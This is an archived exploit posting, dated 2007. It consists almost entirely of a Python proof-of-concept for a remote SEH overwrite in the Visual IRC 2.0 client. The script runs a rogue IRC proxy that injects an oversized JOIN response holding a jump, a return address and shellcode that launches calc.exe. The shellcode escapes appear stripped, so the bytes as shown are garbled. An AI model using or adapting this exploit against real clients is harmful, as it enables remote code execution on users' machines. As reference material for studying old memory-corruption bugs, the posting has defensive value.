Home / os / solaris

virc-oday.txt

Posted on 07 July 2007

#!/usr/bin/python # ViRC 2.0 'JOIN Response' 0day Remote SEH Overwrite PoC Exploit # Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl> # Tested on Visual IRC 2.0 / 2k SP4 Polish # Shellcode type: Windows Execute Command (calc.exe) # How stuff works ? .. # # [ViRC] -----> (..JOIN..) -------------> [exploit_tunnel] -----------------------------> [Real IRC server] # [ViRC] <--- (#channel :AAAAAAA...) <--- [exploit_tunnel] <---- (#channel :nick) <------ [Real IRC server] # # Details: # "#channel :" + "A" * 4116 # 0x41414141 Pointer to next SEH record # 0x41414141 SE handler ## from thread import start_new_thread from struct import pack from string import find from string import join from socket import * LEN_RECV = 65536 in_addr = '0.0.0.0' # local address in_port = 6667 # local port out_addr = '192.168.0.2' # address of IRC server out_port = 6667 # port of IRC server shellcode = ( "x31xc9x83xe9xdbxd9xeexd9x74x24xf4x5bx81x73x13xd8" "x22x72xe4x83xebxfcxe2xf4x24xcax34xe4xd8x22xf9xa1" "xe4xa9x0exe1xa0x23x9dx6fx97x3axf9xbbxf8x23x99x07" "xf6x6bxf9xd0x53x23x9cxd5x18xbbxdex60x18x56x75x25" "x12x2fx73x26x33xd6x49xb0xfcx26x07x07x53x7dx56xe5" "x33x44xf9xe8x93xa9x2dxf8xd9xc9xf9xf8x53x23x99x6d" "x84x06x76x27xe9xe2x16x6fx98x12xf7x24xa0x2dxf9xa4" "xd4xa9x02xf8x75xa9x1axecx31x29x72xe4xd8xa9x32xd0" "xddx5ex72xe4xd8xa9x1axd8x87x13x84x84x8exc9x7fx8c" "x28xa8x76xbbxb0xbax8cx6exd6x75x8dx03x30xccx8dx1b" "x27x41x13x88xbbx0cx17x9cxbdx22x72xe4") NEXT_SEH_RECORD = 0x909006EB # JMP SHORT + 0x06 SE_HANDLER = 0x7CEA41D3 # POP POP RET (SHELL32.DLL / 2k SP4 Polish) buf = "A" * 4108 buf += pack("<L", NEXT_SEH_RECORD) buf += pack("<L", SE_HANDLER) buf += "x90" * 32 buf += shellcode class new_plug_in: def __init__(self): self.sock = 0 self.send_to = 1 self.active = 1 self.plugins = [] self.description = '' def CloseTunnel(self): if(self.active == 1): self.active = 0 self.sock.shutdown(1) self.sock.close() self.plugins[self.send_to].active = 0 self.plugins[self.send_to].sock.shutdown(1) self.plugins[self.send_to].sock.close() def Send(self, data): try: self.sock.send(data) except: self.CloseTunnel() def Recv(self): while(1): try: data = self.sock.recv(LEN_RECV) if(len(data) == 0): self.CloseTunnel() return print self.description print data if(self.description == '[SERVER]'): if(find(data, 'JOIN') != -1): data = build_evil_buf(data, buf) if(data == -1): print "Error: Malformed IRC response" self.CloseTunnel() self.plugins[self.send_to].Send(data) except: self.CloseTunnel() return def Run(self): if(len(self.plugins) == 0): self.plugins.append(self) try: s = socket(AF_INET, SOCK_STREAM) s.connect((out_addr, out_port)) except: s.close() self.sock.close() return tunnel_out = new_plug_in() tunnel_out.sock = s tunnel_out.send_to = 0 self.plugins.append(tunnel_out) self.description = '[CLIENT]' tunnel_out.description = '[SERVER]' tunnel_out.plugins = self.plugins tunnel_out.Run() start_new_thread(self.Recv, ()) def build_evil_buf(data, buf): try: lines = data.split(' ') tmp = lines[1].split('x20:') tmp[1] = buf lines[1] = join(tmp, "x20:") return join(lines, " ") except: return -1 def AcceptConnect(cl, addr): print "Connection accepted from: %s" % (addr[0]) tunnel_in = new_plug_in() tunnel_in.sock = cl tunnel_in.Run() def InitServer(bind_addr, bind_port): s = socket(AF_INET, SOCK_STREAM) s.bind((bind_addr, bind_port)) print "Listening on %s:%d..." % (bind_addr, bind_port) s.listen(1) while(1): cl, addr = s.accept() start_new_thread(AcceptConnect, (cl, addr,)) s.close() InitServer(in_addr, in_port) # EoF

 

TOP